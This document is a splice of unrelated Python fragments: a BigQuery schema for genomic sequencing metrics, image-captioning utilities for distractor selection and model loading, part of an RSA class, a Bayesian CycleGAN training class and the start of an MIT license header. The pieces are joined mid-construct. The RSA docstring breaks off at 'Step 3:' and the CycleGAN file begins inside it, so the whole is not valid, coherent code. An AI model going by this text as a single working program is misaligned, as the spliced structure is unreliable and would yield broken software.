input_manifest_file_id = BQField('input_manifest_file_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
feedback_manifest_file_id = BQField('feedback_manifest_file_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
feedback_record_count = BQField('feedback_record_count', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
feedback_complete = BQField('feedback_complete', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
feedback_complete_date = BQField('feedback_complete_date', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
ignore_flag = BQField('ignore_flag', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
class BQGenomicManifestFeedback(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_manifest_feedback'
__schema__ = BQGenomicManifestFeedbackSchema
class BQGenomicManifestFeedbackView(BQView):
__viewname__ = 'v_genomic_manifest_feedback'
__viewdescr__ = 'Genomic Manifest Feedback View'
__pk_id__ = 'id'
__table__ = BQGenomicManifestFeedback
__sql__ = """
SELECT gmf.*
FROM (
SELECT *,
ROW_NUMBER() OVER (PARTITION BY orig_id ORDER BY modified desc) AS rn
FROM `{project}`.{dataset}.genomic_manifest_feedback
) gmf
WHERE gmf.rn = 1 and gmf.ignore_flag = 0
"""
class BQGenomicGCValidationMetricsSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
orig_created = BQField('orig_created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
orig_modified = BQField('orig_modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_member_id = BQField('genomic_set_member_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
genomic_file_processed_id = BQField('genomic_file_processed_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
lims_id = BQField('lims_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
call_rate = BQField('call_rate', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
mean_coverage = BQField('mean_coverage', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genome_coverage = BQField('genome_coverage', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
contamination = BQField('contamination', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
sex_concordance = BQField('sex_concordance', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
processing_status = BQField('processing_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
notes = BQField('notes', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
site_id = BQField('site_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
chipwellbarcode = BQField('chipwellbarcode', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
idat_green_received = BQField('idat_green_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
idat_red_received = BQField('idat_red_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
vcf_received = BQField('vcf_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
crai_received = BQField('crai_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
cram_md5_received = BQField('cram_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
cram_received = BQField('cram_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
hf_vcf_md5_received = BQField('hf_vcf_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
hf_vcf_received = BQField('hf_vcf_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
hf_vcf_tbi_received = BQField('hf_vcf_tbi_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
raw_vcf_md5_received = BQField('raw_vcf_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
raw_vcf_received = BQField('raw_vcf_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
raw_vcf_tbi_received = BQField('raw_vcf_tbi_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
sex_ploidy = BQField('sex_ploidy', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
idat_green_md5_received = BQField('idat_green_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
if not self.silent:
print("after expansion we have {} distractor images".format(len(overall_distractor_ids)))
distractors_by_partition.append((qud, overall_distractor_ids, overall_similar_ids))
return distractors_by_partition
# Step 2: retrieve each image
# with a cap, exceed the cap, we shuffle the cell list, pick first k
# or we can do a strategy (in the future)
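# Each entry appended to distractors_by_partition is a tuple
# (qud, distractor_image_ids, similar_image_ids): distractors come from cells that
# do NOT contain img_id, similar images from the cell that does (minus img_id itself).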
distractors_by_partition = []
for par in partitions:
# par: ('What are the chairs made off?', {'metal': [404545], 'wood': [57870]})
# get negated cells
negated_cells = []
same_cells = []
qud = par[0]
for ans, cell in par[1].items():
if img_id not in cell:
negated_cells.append((ans, cell))
else:
new_cell = [c for c in cell if c != img_id]
same_cells.append((ans, new_cell))
overall_distractor_ids = []
for ans, cell in negated_cells[:self.max_num_cells]:
selected_imgs = self.get_top_k_from_cell(cell)
overall_distractor_ids.extend(selected_imgs)
overall_similar_ids = []
for ans, cell in same_cells[:self.max_num_cells]:
selected_imgs = self.get_top_k_from_cell(cell)
overall_similar_ids.extend(selected_imgs)
assert img_id not in overall_distractor_ids
assert img_id not in overall_similar_ids
distractors_by_partition.append((qud, overall_distractor_ids, overall_similar_ids))
return distractors_by_partition
def map_img_id_to_idx(self, img_id):
# we don't need to worry about counter and wrapped
# elem = (self._index_list[self.iter_counter], self.iter_counter+1, wrapped)
return (self.image_id_to_loader_idx[img_id], 0, False)
def get_batch(self, list_img_ids, split='test'):
"""
This is used to retrieve distractor images and turn them into a batch!
:param list_img_ids: a list of image ids, integer; we turn them into a batch
:param split: this is used to get `it_max`, how many images in the split
:return:
We return something that can be handled by model automatically
{'fc_feats': tensor([[0.]]),
'att_feats': tensor([[[6.0150e+00, 4.4883e-01, 4.1887e-02, ..., 0.0000e+00,
1.0197e-01, 7.9792e+00],
[1.4278e+00, 0.0000e+00, 0.0000e+00, ..., 0.0000e+00,
3.9953e-01, 0.0000e+00],
[5.9261e-01, 0.0000e+00, 0.0000e+00, ..., 0.0000e+00,
5.5667e-01, 5.3477e-03],
...,
[2.6863e+00, 1.1994e-01, 0.0000e+00, ..., 0.0000e+00,
0.0000e+00, 0.0000e+00],
[4.2054e+00, 3.4663e+00, 0.0000e+00, ..., 0.0000e+00,
1.5952e-01, 0.0000e+00],
[3.5983e+00, 0.0000e+00, 0.0000e+00, ..., 0.0000e+00,
1.6066e-02, 4.9341e-03]]]),
'att_masks': None,
'labels': tensor([[ 0, 1, 38, 39, 1, 40, 6, 41, 42, 43, 1, 44, 0, 0, 0, 0, 0, 0],
[ 0, 1, 38, 43, 1, 45, 46, 47, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 1, 38, 39, 1, 48, 40, 43, 1, 45, 47, 44, 0, 0, 0, 0, 0, 0],
[ 0, 49, 35, 1, 38, 50, 35, 43, 1, 46, 44, 0, 0, 0, 0, 0, 0, 0],
[ 0, 1, 38, 51, 1, 44, 3, 14, 16, 17, 1, 52, 53, 0, 0, 0, 0, 0]]),
'masks': tensor([[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0.]]),
'gts': (array([[ 1, 38, 39, 1, 40, 6, 41, 42, 43, 1, 44, 0, 0, 0, 0, 0],
[ 1, 38, 43, 1, 45, 46, 47, 44, 0, 0, 0, 0, 0, 0, 0, 0],
[ 1, 38, 39, 1, 48, 40, 43, 1, 45, 47, 44, 0, 0, 0, 0, 0],
[49, 35, 1, 38, 50, 35, 43, 1, 46, 44, 0, 0, 0, 0, 0, 0],
[ 1, 38, 51, 1, 44, 3, 14, 16, 17, 1, 52, 53, 0, 0, 0, 0]],
dtype=uint32),),
'bounds': {'it_pos_now': 0, 'it_max': 5000, 'wrapped': False},
'infos': ({'ix': 1,
'id': 522418,
'file_path': 'val2014/COCO_val2014_000000522418.jpg'},)}
"""
batch = [self.dataset[self.map_img_id_to_idx(img_id)] for img_id in list_img_ids]
return self.dataset.collate_func(batch, split)
def load_model(argstring=None, split='test', batch_size=5, beam_size=5):
import opts
import argparse
import misc.utils as utils
# Input arguments and options
parser = argparse.ArgumentParser()
# Input paths
parser.add_argument('--model', type=str, default='',
help='path to model to evaluate')
parser.add_argument('--cnn_model', type=str, default='resnet101',
help='resnet101, resnet152')
parser.add_argument('--infos_path', type=str, default='',
help='path to infos to evaluate')
parser.add_argument('--only_lang_eval', type=int, default=0,
help='lang eval on saved results')
parser.add_argument('--force', type=int, default=0,
help='force to evaluate no matter if there are results available')
opts.add_eval_options(parser)
opts.add_diversity_opts(parser)
if argstring is None:
opt = parser.parse_args(
"--dump_images 0 --num_images 5000 --model ./data/bottomup/trans_nsc/model-best.pth --infos_path ./data/bottomup/trans_nsc/infos_trans_nsc-best.pkl --language_eval 1 --sample_method bs --beam_size {}".format(
beam_size).split())
else:
opt = parser.parse_args(argstring.split())
with open(opt.infos_path, 'rb') as f:
infos = utils.pickle_load(f)
# override and collect parameters
replace = ['input_fc_dir', 'input_att_dir', 'input_box_dir', 'input_label_h5', 'input_json', 'batch_size', 'id']
ignore = ['start_from']
for k in vars(infos['opt']).keys():
if k in replace:
setattr(opt, k, getattr(opt, k) or getattr(infos['opt'], k, ''))
elif k not in ignore:
if not k in vars(opt):
vars(opt).update({k: vars(infos['opt'])[k]}) # copy over options from model
vocab = infos['vocab'] # ix -> word mapping
opt.batch_size = batch_size
# Setup the model
opt.vocab = vocab
model = models.setup(opt)
del opt.vocab # why is this deleting vocab? But well, it's what they do...
model.load_state_dict(torch.load(opt.model))
model.cuda()
if split != 'train':
model.eval()
# crit = utils.LanguageModelCriterion()
loader = DataLoader(opt)
loader.reset_iterator(split)
return model, loader, opt
def load_lm_model(model_name='log_transformer_lm', split='test', batch_size=5, beam_size=1):
# TODO: note that with self-critical loss, it may or may not make sense to train LM on such loss.
import opts
import argparse
import misc.utils as utils
# Input arguments and options
parser = argparse.ArgumentParser()
# Input paths
parser.add_argument('--model', type=str, default='',
help='path to model to evaluate')
parser.add_argument('--cnn_model', type=str, default='resnet101',
help='resnet101, resnet152')
parser.add_argument('--infos_path', type=str, default='',
help='path to infos to evaluate')
parser.add_argument('--only_lang_eval', type=int, default=0,
help='lang eval on saved results')
parser.add_argument('--force', type=int, default=0,
help='force to evaluate no matter if there are results available')
opts.add_eval_options(parser)
opts.add_diversity_opts(parser)
if model_name == 'log_transformer_lm':
opt = parser.parse_args(
"--dump_images 0 --num_images 5000 --model ./log_transformer_lm/model-best.pth --infos_path ./log_transformer_lm/infos_transformer_lm.pkl --language_eval 1 --sample_method bs --beam_size {}".format(
beam_size).split())
else:
raise Exception("LM Model not trained yet")
with open(opt.infos_path, 'rb') as f:
infos = utils.pickle_load(f)
# override and collect parameters
replace = ['input_fc_dir', 'input_att_dir', 'input_box_dir', 'input_label_h5', 'input_json', 'batch_size', 'id']
ignore = ['start_from']
for k in vars(infos['opt']).keys():
if k in replace:
setattr(opt, k, getattr(opt, k) or getattr(infos['opt'], k, ''))
elif k not in ignore:
if not k in vars(opt):
vars(opt).update({k: vars(infos['opt'])[k]}) # copy over options from model
vocab = infos['vocab'] # ix -> word mapping
opt.batch_size = batch_size
# Setup the model
opt.vocab = vocab
# model = models.setup(opt)
model = TransformerLM(opt)
del opt.vocab # why is this deleting vocab? But well, it's what they do...
model.load_state_dict(torch.load(opt.model))
model.cuda()
if split != 'train':
model.eval()
# crit = utils.LanguageModelCriterion()
# loader = DataLoader(opt)
# loader.reset_iterator(split)
return model, opt
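# Hypothetical usage sketch (added for illustration, not from the original source;
# assumes the checkpoint paths hard-coded above actually exist on disk):
# lm_model, lm_opt = load_lm_model('log_transformer_lm', split='test', batch_size=5, beam_size=1)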
def logsumexp(inputs, dim=None, keepdim=False):
"""Numerically stable logsumexp.
Args:
inputs: A Variable with any shape.
dim: An integer.
keepdim: A boolean.
Returns:
Equivalent of log(sum(exp(inputs), dim=dim, keepdim=keepdim)).
"""
# For a 1-D array x (any array along a single dimension),
# log sum exp(x) = s + log sum exp(x - s)
# with s = max(x) being a common choice.
if dim is None:
inputs = inputs.view(-1)
dim = 0
s, _ = torch.max(inputs, dim=dim, keepdim=True)
outputs = s + (inputs - s).exp().sum(dim=dim, keepdim=True).log()
if not keepdim:
outputs = outputs.squeeze(dim)
return outputs
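# Minimal illustration (added sketch, not part of the original code): shows how the
# column normalization described in the RSA docstring below is just a subtraction in
# log space. Assumes torch is already imported at the top of this module.
def _demo_logsumexp_column_normalization():
    # literal matrix of log-probs: rows are images i, i', i''; columns are captions c1..c3
    log_probs = torch.tensor([[-5., -6., -20.],
                              [-5., -9., -20.],
                              [-10., -11., -20.]])
    # column normalization: each entry minus the logsumexp of its column,
    # i.e. log S0(c|i) -> log L1(i|c) under a uniform image prior
    col_norm = log_probs - logsumexp(log_probs, dim=0, keepdim=True)
    # every column of exp(col_norm) now sums to 1
    return col_norm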
class RSA(object):
"""
RSA through matrix normalization
Given a literal matrix of log-prob
c1 c2 c3
i -5 -6 -20
i' -5 -9 -20
i'' -10 -11 -20
RSA has three cases:
Case 1: If a sequence (C) has high prob for i, but high also in i', i'', the prob is relatively down-weighted
Case 2: If a sequence (C) has low prob for i, but low also in i', i'', the prob is then relatively up-weighted (higher than original)
Case 3: If a sequence (C) has high prob for i, but low for i', i'', the prob is relatively up-weighted
(But this is hard to say due to the final row normalization)
use logsumexp() to compute normalization constant
Normalization/division in log-space is just a subtraction
Column normalization means: -5 - logsumexp([-5, -5, -10])
(Add together a column)
Row normalization means: -5 - logsumexp([-5, -6, -20])
(Add together a row)
We can compute RSA through the following steps:
Step 1: add image prior: + log P(i) to the row
Step 2: Column normalize
- Pragmatic Listener L1: L1(i|c) \propto S0(c|i) P(i)
Step 3:
# -*- coding: utf-8 -*-
"""
@author : <NAME>
"""
import numpy as np
import torch
import os
from collections import OrderedDict
from torch.autograd import Variable
# from torch.optim import lr_scheduler
import itertools
import util.util as util
from util.image_pool import ImagePool
from . import networks
import sys
import random
from PIL import Image
import torchvision.transforms as transforms
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
class CycleGAN():
def name(self):
return 'Bayesian CycleGAN Model'
def initialize(self, opt):
self.opt = opt
self.isTrain = opt.isTrain
if torch.cuda.is_available():
print('cuda is available, we will use gpu!')
self.Tensor = torch.cuda.FloatTensor
torch.cuda.manual_seed_all(100)
else:
self.Tensor = torch.FloatTensor
torch.manual_seed(100)
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name)
# get ratio for network initialization
ratio = 256 * 256 / opt.loadSize / (opt.loadSize / opt.ratio)
# load network
netG_input_nc = opt.input_nc + 1
netG_output_nc = opt.output_nc + 1
self.netG_A = networks.define_G(netG_input_nc, opt.output_nc, opt.ngf, opt.netG_A,
opt.n_downsample_global, opt.n_blocks_global, opt.norm).type(self.Tensor)
self.netG_B = networks.define_G(netG_output_nc, opt.input_nc, opt.ngf, opt.netG_B,
opt.n_downsample_global, opt.n_blocks_global, opt.norm).type(self.Tensor)
if self.isTrain:
use_sigmoid = opt.no_lsgan
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.n_layers_D, opt.norm,
use_sigmoid, opt.num_D_A).type(self.Tensor)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.n_layers_D, opt.norm,
use_sigmoid, opt.num_D_B).type(self.Tensor)
if not self.isTrain or opt.continue_train:
self.load_network(self.netG_A, 'G_A', opt.which_epoch, self.save_dir)
self.load_network(self.netG_B, 'G_B', opt.which_epoch, self.save_dir)
if self.isTrain:
self.load_network(self.netD_A, 'D_A', opt.which_epoch, self.save_dir)
self.load_network(self.netD_B, 'D_B', opt.which_epoch, self.save_dir)
# set loss functions and optimizers
if self.isTrain:
self.old_lr = opt.lr
# define loss function
self.criterionGAN = networks.GANLoss(use_lsgan=not opt.no_lsgan, tensor=self.Tensor)
self.criterionCycle = torch.nn.L1Loss()
self.criterionL1 = torch.nn.L1Loss()
# initialize optimizers
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D_A = torch.optim.Adam(self.netD_A.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D_B = torch.optim.Adam(self.netD_B.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
print('----------Network initialized!-----------')
self.print_network(self.netG_A)
self.print_network(self.netG_B)
if self.isTrain:
self.print_network(self.netD_A)
self.print_network(self.netD_B)
print('-----------------------------------------')
def set_input(self, input):
AtoB = self.opt.which_direction == 'AtoB'
self.input_A = input['A' if AtoB else 'B']
self.input_B = input['B' if AtoB else 'A']
self.image_paths = input['A_paths' if AtoB else 'B_paths']
def forward(self):
self.real_A = Variable(self.input_A).type(self.Tensor)
self.real_B = Variable(self.input_B).type(self.Tensor)
# combine input image with random noise z
self.real_B_zx = []
for i in range(0, self.opt.mc_x):
self.z_x = self.get_z_random(self.real_B[0, 1].size(), 'gauss')
self.z_x = torch.unsqueeze(self.z_x, 0)
self.z_x = torch.unsqueeze(self.z_x, 0)
real_B_zx = []
for i in range(0, self.opt.batchSize):
_real = torch.unsqueeze(self.real_B[i], 0)
_real = torch.cat([_real, self.z_x], dim=1)
real_B_zx.append(_real)
real_B_zx = torch.cat(real_B_zx)
self.real_B_zx.append(real_B_zx)
self.real_A_zy = []
for i in range(0, self.opt.mc_y):
self.z_y = self.get_z_random(self.real_A[0, 1].size(), 'gauss')
self.z_y = torch.unsqueeze(self.z_y, 0)
self.z_y = torch.unsqueeze(self.z_y, 0)
real_A_zy = []
for i in range(0, self.opt.batchSize):
_real = torch.unsqueeze(self.real_A[i], 0)
_real = torch.cat([_real, self.z_y], dim=1)
real_A_zy.append(_real)
real_A_zy = torch.cat(real_A_zy)
self.real_A_zy.append(real_A_zy)
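# Shape note (illustrative comment added for clarity, not from the original source):
# get_z_random() draws an (H, W) noise map, the two unsqueeze calls make it
# (1, 1, H, W), and concatenating it per-sample along dim=1 turns a (B, C, H, W)
# batch into a (B, C + 1, H, W) generator input, matching
# netG_input_nc = opt.input_nc + 1 in initialize().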
def inference(self):
real_A = Variable(self.input_A).type(self.Tensor)
real_B = Variable(self.input_B).type(self.Tensor)
# combine input image with random noise z
real_B_zx = []
z_x = self.get_z_random(real_B[0, 1].size(), 'gauss')
z_x = torch.unsqueeze(z_x, 0)
z_x = torch.unsqueeze(z_x, 0)
for i in range(0, self.opt.batchSize):
_real = torch.cat((real_B[i:i + 1], z_x), dim=1)
real_B_zx.append(_real)
real_B_zx = torch.cat(real_B_zx)
real_A_zy = []
z_y = self.get_z_random(real_A[0, 1].size(), 'gauss')
z_y = torch.unsqueeze(z_y, 0)
z_y = torch.unsqueeze(z_y, 0)
for i in range(0, self.opt.batchSize):
_real = torch.cat((real_A[i:i + 1], z_y), dim=1)
real_A_zy.append(_real)
real_A_zy = torch.cat(real_A_zy)
# inference
fake_B = self.netG_A(real_A_zy)
fake_B_next = torch.cat((fake_B, z_x), dim=1)
self.rec_A = self.netG_B(fake_B_next).data
self.fake_B = fake_B.data
fake_A = self.netG_B(real_B_zx)
fake_A_next = torch.cat((fake_A, z_y), dim=1)
self.rec_B = self.netG_A(fake_A_next).data
self.fake_A = fake_A.data
def get_image_paths(self):
return self.image_paths
def img_resize(self, img, target_width):
ow, oh = img.size
if (ow == target_width):
return img
else:
w = target_width
h = int(target_width * oh / ow)
return img.resize((w, h), Image.BICUBIC)
def get_z_random(self, nz, random_type='gauss'):
z = self.Tensor(nz)
if random_type == 'uni':
z.copy_(torch.rand(nz) * 2.0 - 1.0)
elif random_type == 'gauss':
z.copy_(torch.randn(nz))
z = Variable(z)
return z
def backward_G(self):
# GAN loss D_A(G_A(A))
fake_B = []
for real_A in self.real_A_zy:
_fake = self.netG_A(real_A)
fake_B.append(_fake)
fake_B = torch.cat(fake_B)
pred_fake = self.netD_A(fake_B)
loss_G_A = self.criterionGAN(pred_fake, True)
# GAN loss D_B(G_B(B))
fake_A = []
for real_B in self.real_B_zx:
_fake = self.netG_B(real_B)
fake_A.append(_fake)
fake_A = torch.cat(fake_A)
pred_fake = self.netD_B(fake_A)
loss_G_B = self.criterionGAN(pred_fake, True)
# cycle loss
lambda_A = self.opt.lambda_A
lambda_B = self.opt.lambda_B
# Forward cycle loss
fake_B_next = []
for i in range(0, self.opt.mc_y):
_fake = fake_B[i * self.opt.batchSize:(i + 1) * self.opt.batchSize]
_fake = torch.cat((_fake, self.z_x), dim=1)
fake_B_next.append(_fake)
fake_B_next = torch.cat(fake_B_next)
rec_A = self.netG_B(fake_B_next)
loss_cycle_A = 0
for i in range(0, self.opt.mc_y):
loss_cycle_A += self.criterionCycle(rec_A[i * self.opt.batchSize:(i + 1) * self.opt.batchSize],
self.real_A) * lambda_A
pred_cycle_G_A = self.netD_B(rec_A)
loss_cycle_G_A = self.criterionGAN(pred_cycle_G_A, True)
# Backward cycle loss
fake_A_next = []
for i in range(0, self.opt.mc_x):
_fake = fake_A[i * self.opt.batchSize:(i + 1) * self.opt.batchSize]
_fake = torch.cat((_fake, self.z_y), dim=1)
fake_A_next.append(_fake)
fake_A_next = torch.cat(fake_A_next)
rec_B = self.netG_A(fake_A_next)
loss_cycle_B = 0
for i in range(0, self.opt.mc_x):
loss_cycle_B += self.criterionCycle(rec_B[i * self.opt.batchSize:(i + 1) * self.opt.batchSize],
self.real_B) * lambda_B
pred_cycle_G_B = self.netD_A(rec_B)
loss_cycle_G_B = self.criterionGAN(pred_cycle_G_B, True)
# prior loss
prior_loss_G_A = self.get_prior(self.netG_A.parameters(), self.opt.batchSize)
prior_loss_G_B = self.get_prior(self.netG_B.parameters(), self.opt.batchSize)
# total loss
loss_G = loss_G_A + loss_G_B + (prior_loss_G_A + prior_loss_G_B) + (loss_cycle_G_A + loss_cycle_G_B) * self.opt.gamma + (loss_cycle_A + loss_cycle_B)
loss_G.backward()
self.fake_B = fake_B.data
self.fake_A = fake_A.data
self.rec_A = rec_A.data
self.rec_B = rec_B.data
self.loss_G_A = loss_G_A.data[0] + loss_cycle_G_A.data[0] * self.opt.gamma + prior_loss_G_A.data[0]
self.loss_G_B = loss_G_B.data[0] + loss_cycle_G_B.data[0] * self.opt.gamma + prior_loss_G_B.data[0]
self.loss_cycle_A = loss_cycle_A.data[0]
self.loss_cycle_B = loss_cycle_B.data[0]
def backward_D_A(self):
fake_B = Variable(self.fake_B).type(self.Tensor)
rec_B = Variable(self.rec_B).type(self.Tensor)
# how well it classifies fake images
pred_fake = self.netD_A(fake_B.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
pred_cycle_fake = self.netD_A(rec_B.detach())
loss_D_cycle_fake = self.criterionGAN(pred_cycle_fake, False)
# how well it classifies real images
pred_real = self.netD_A(self.real_B)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_y
# prior loss
prior_loss_D_A = self.get_prior(self.netD_A.parameters(), self.opt.batchSize)
# total loss
loss_D_A = (loss_D_real + loss_D_fake) * 0.5 + (loss_D_real + loss_D_cycle_fake) * 0.5 * self.opt.gamma + prior_loss_D_A
loss_D_A.backward()
self.loss_D_A = loss_D_A.data[0]
def backward_D_B(self):
fake_A = Variable(self.fake_A).type(self.Tensor)
rec_A = Variable(self.rec_A).type(self.Tensor)
# how well it classifies fake images
pred_fake = self.netD_B(fake_A.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
pred_cycle_fake = self.netD_B(rec_A.detach())
loss_D_cycle_fake = self.criterionGAN(pred_cycle_fake, False)
# how well it classifies real images
pred_real = self.netD_B(self.real_A)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_x
# prior loss
prior_loss_D_B = self.get_prior(self.netD_B.parameters(), self.opt.batchSize)
# total loss
loss_D_B = (loss_D_real + loss_D_fake) * 0.5 + (loss_D_real + loss_D_cycle_fake) * 0.5 * self.opt.gamma + prior_loss_D_B
loss_D_B.backward()
self.loss_D_B = loss_D_B.data[0]
def backward_G_pair(self):
# GAN loss D_A(G_A(A)) and L1 loss
fake_B = []
loss_G_A_L1 = 0
for real_A in self.real_A_zy:
_fake = self.netG_A(real_A)
loss_G_A_L1 += self.criterionL1(_fake, self.real_B) * self.opt.lambda_A
fake_B.append(_fake)
fake_B = torch.cat(fake_B)
pred_fake = self.netD_A(fake_B)
loss_G_A = self.criterionGAN(pred_fake, True)
# GAN loss D_B(G_B(B))
fake_A = []
loss_G_B_L1 = 0
for real_B in self.real_B_zx:
_fake = self.netG_B(real_B)
loss_G_B_L1 += self.criterionL1(_fake, self.real_A) * self.opt.lambda_B
fake_A.append(_fake)
fake_A = torch.cat(fake_A)
pred_fake = self.netD_B(fake_A)
loss_G_B = self.criterionGAN(pred_fake, True)
# prior loss
prior_loss_G_A = self.get_prior(self.netG_A.parameters(), self.opt.batchSize)
prior_loss_G_B = self.get_prior(self.netG_B.parameters(), self.opt.batchSize)
# total loss
loss_G = loss_G_A + loss_G_B + (prior_loss_G_A + prior_loss_G_B) + (loss_G_A_L1 + loss_G_B_L1)
loss_G.backward()
self.fake_B = fake_B.data
self.fake_A = fake_A.data
self.loss_G_A_L1 = loss_G_A_L1.data[0]
self.loss_G_B_L1 = loss_G_B_L1.data[0]
def backward_D_A_pair(self):
fake_B = Variable(self.fake_B).type(self.Tensor)
# how well it classifies fake images
pred_fake = self.netD_A(fake_B.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# how well it classifies real images
pred_real = self.netD_A(self.real_B)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_y
# prior loss
prior_loss_D_A = self.get_prior(self.netD_A.parameters(), self.opt.batchSize)
# total loss
loss_D_A = (loss_D_real + loss_D_fake) * 0.5 + prior_loss_D_A
loss_D_A.backward()
def backward_D_B_pair(self):
fake_A = Variable(self.fake_A).type(self.Tensor)
# how well it classifies fake images
pred_fake = self.netD_B(fake_A.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# how well it classifies real images
pred_real = self.netD_B(self.real_A)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_x
# prior loss
prior_loss_D_B = self.get_prior(self.netD_B.parameters(), self.opt.batchSize)
# total loss
loss_D_B = (loss_D_real + loss_D_fake) * 0.5 + prior_loss_D_B
loss_D_B.backward()
def optimize(self, pair=False):
# forward
self.forward()
# G_A and G_B
# E_A and E_B
self.optimizer_G.zero_grad()
if pair == True:
self.backward_G_pair()
else:
self.backward_G()
self.optimizer_G.step()
# D_A
self.optimizer_D_A.zero_grad()
if pair == True:
self.backward_D_A_pair()
else:
self.backward_D_A()
self.optimizer_D_A.step()
# D_B
self.optimizer_D_B.zero_grad()
if pair == True:
self.backward_D_B_pair()
else:
self.backward_D_B()
self.optimizer_D_B.step()
def get_current_loss(self):
loss = OrderedDict([
('D_A', self.loss_D_A),
('D_B', self.loss_D_B),
('G_A', self.loss_G_A),
('G_B', self.loss_G_B)
])
if self.opt.gamma == 0:
loss['cyc_A'] = self.loss_cycle_A
loss['cyc_B'] = self.loss_cycle_B
elif self.opt.gamma > 0:
loss['cyc_G_A'] = self.loss_cycle_A
loss['cyc_G_B'] = self.loss_cycle_B
return loss
def get_stye_loss(self):
loss = OrderedDict([
('L1_A', self.loss_G_A_L1),
('L1_B', self.loss_G_B_L1)
])
return loss
def get_current_visuals(self):
real_A = util.tensor2im(self.input_A)
fake_B = util.tensor2im(self.fake_B)
rec_A = util.tensor2im(self.rec_A)
real_B = util.tensor2im(self.input_B)
fake_A = util.tensor2im(self.fake_A)
rec_B = util.tensor2im(self.rec_B)
visuals = OrderedDict([
('real_A', real_A),
('fake_B', fake_B),
('rec_A', rec_A),
('real_B', real_B),
('fake_A', fake_A),
('rec_B', rec_B)
])
return visuals
# MIT License
#
# Copyright (c) 2018-2019 Red Hat, Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
